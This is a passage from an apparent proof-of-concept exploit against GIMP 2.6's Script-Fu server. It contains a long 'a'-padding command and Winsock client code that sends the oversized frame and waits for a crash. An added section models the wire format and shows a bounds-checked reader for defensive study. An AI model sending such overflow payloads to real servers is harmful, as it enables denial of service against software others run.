aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";

    /* Script-Fu server request: magic byte 'G', then the 16-bit big-endian
     * command length L, then L bytes of command. sizeof(command) includes the
     * terminating NUL, so L counts it too and matches the bytes sent below. */
    Buffer[0] = '\x47';                          // Magic byte 'G'
    Buffer[1] = (char)(sizeof(command) / 256);   // High byte of L - L div 256
    Buffer[2] = (char)(sizeof(command) % 256);   // Low byte of L - L mod 256
    memcpy(&Buffer[3], command, sizeof(command));

    retval = send(conn_socket, Buffer, (int)(sizeof(command) + 3), 0);
    if (retval == SOCKET_ERROR) {
        fprintf(stderr, "Client: send() failed: error %d.\n", WSAGetLastError());
        WSACleanup();
        return;
    }
    printf("Client: send() is OK.\n");
    printf("Client: Sent %d bytes (command length %u)\n", retval, (unsigned) sizeof(command));
}

void recvdata(void)
{
    int i = 0;
    int retval = 0;

    memset(inBuffer, 0, sizeof(inBuffer));
    retval = recv(conn_socket, inBuffer, sizeof(inBuffer), 0);
    printf("retval is: %d\n", retval);

    if (retval == SOCKET_ERROR) {
        fprintf(stderr, "Client: recv() failed: error %d.\n", WSAGetLastError());
        closesocket(conn_socket);
        WSACleanup();
        return;
    }
    if (retval == 0) {
        // Connection closed without a reply: the server has most likely crashed.
        printf("Client: connection closed by peer, no response.\n");
        return;
    }

    // Reply format: 'G', error flag, 16-bit big-endian length, message text.
    printf("first char is: %x\n", (unsigned char) inBuffer[0]);
    printf("Client: recv() is OK.\n");
    // print the message contents...
    for (i = 0; i < retval; i++) {
        printf("%c", inBuffer[i]);
    }
    printf("\n");
    fflush(stdout);
}
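The PoC above hard-codes the Script-Fu server framing ('G', two length bytes, command) and simply makes the length large. The following is an added example, not part of the original PoC or of GIMP's source: portable C that builds and decodes that framing, measures how far a length-trusting copy into a fixed buffer would overrun, and shows the bounds check a hardened reader must make before copying. `SRV_BUF` is an assumed, illustrative buffer size (not GIMP's real one), `sf_overflow_bytes` is a schematic of the bug class rather than the vendor's code, and `(gimp-version)` is just a benign Script-Fu expression used as sample input.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Script-Fu server wire format, as used by the PoC above:
 *   request : 'G' | len_hi | len_lo | command   (len = len_hi * 256 + len_lo)
 *   response: 'G' | err    | len_hi | len_lo | message
 */
#define SF_MAGIC        'G'
#define SF_REQ_HEADER   3
#define SF_RESP_HEADER  4

/* Assumption: illustrative fixed server-side buffer size, not GIMP's real one. */
#define SRV_BUF 4096

/* Build a request frame. Returns the frame length, or -1 when the command does
 * not fit the 16-bit length field or the output buffer. */
long sf_build_request(uint8_t *out, size_t outcap, const uint8_t *cmd, size_t cmdlen)
{
    if (cmdlen > 0xFFFF || outcap < SF_REQ_HEADER + cmdlen)
        return -1;
    out[0] = SF_MAGIC;
    out[1] = (uint8_t)(cmdlen >> 8);
    out[2] = (uint8_t)(cmdlen & 0xFF);
    memcpy(out + SF_REQ_HEADER, cmd, cmdlen);
    return (long)(SF_REQ_HEADER + cmdlen);
}

/* Decode the 16-bit big-endian command length from a request header. */
size_t sf_request_len(const uint8_t *frame)
{
    return ((size_t)frame[1] << 8) | frame[2];
}

/* Schematic of the bug class (not GIMP's code): a server that copies len bytes
 * plus a NUL into a SRV_BUF-byte buffer without checking len. Returns how many
 * bytes such a copy would write past the end (0 = fits). */
size_t sf_overflow_bytes(const uint8_t *frame, size_t framelen)
{
    if (framelen < SF_REQ_HEADER || frame[0] != SF_MAGIC)
        return 0;
    size_t need = sf_request_len(frame) + 1;   /* +1 for the terminating NUL */
    return need > SRV_BUF ? need - SRV_BUF : 0;
}

/* Hardened reader: checks the attacker-controlled length against the
 * destination capacity and the bytes actually received before copying. */
int sf_read_command_safe(const uint8_t *frame, size_t framelen, char *dst, size_t dstcap)
{
    if (framelen < SF_REQ_HEADER || frame[0] != SF_MAGIC)
        return -1;
    size_t cmdlen = sf_request_len(frame);
    if (cmdlen >= dstcap)                       /* would not fit with its NUL */
        return -1;
    if (framelen - SF_REQ_HEADER < cmdlen)      /* truncated frame */
        return -1;
    memcpy(dst, frame + SF_REQ_HEADER, cmdlen);
    dst[cmdlen] = '\0';
    return (int)cmdlen;
}

/* Parse a response header into *err and *msglen. Returns 0 on success, -1 on a
 * short read or a bad magic byte. */
int sf_parse_response(const uint8_t *in, size_t inlen, int *err, size_t *msglen)
{
    if (inlen < SF_RESP_HEADER || in[0] != SF_MAGIC)
        return -1;
    *err    = in[1];
    *msglen = ((size_t)in[2] << 8) | in[3];
    return 0;
}

int main(void)
{
    static uint8_t frame[0x10000 + SF_REQ_HEADER];
    static uint8_t cmd[0x10000];
    char dst[SRV_BUF];
    memset(cmd, 'a', sizeof cmd);                /* constructed sample input */

    /* A command one byte past the 16-bit field cannot be framed at all. */
    printf("65536-byte command framed: %ld\n",
           sf_build_request(frame, sizeof frame, cmd, 0x10000));

    /* A 10000-byte run of 'a' frames fine but overruns a SRV_BUF buffer. */
    long n = sf_build_request(frame, sizeof frame, cmd, 10000);
    printf("frame %ld bytes, header %02x %02x %02x, overflow by %zu bytes\n",
           n, frame[0], frame[1], frame[2], sf_overflow_bytes(frame, (size_t)n));
    printf("hardened reader accepts it: %d\n",
           sf_read_command_safe(frame, (size_t)n, dst, sizeof dst));

    /* A benign Script-Fu expression passes the hardened reader. */
    const char *ok = "(gimp-version)";
    n = sf_build_request(frame, sizeof frame, (const uint8_t *)ok, strlen(ok));
    int got = sf_read_command_safe(frame, (size_t)n, dst, sizeof dst);
    printf("hardened reader returns %d for \"%s\"\n", got, dst);
    return 0;
}
```

The check that matters is the `cmdlen >= dstcap` comparison in `sf_read_command_safe`: the length field is fully attacker-controlled, so the server, not the client, has to bound it. A client-side test against a live 2.6 server is the PoC above; this block lets you reason about the framing offline.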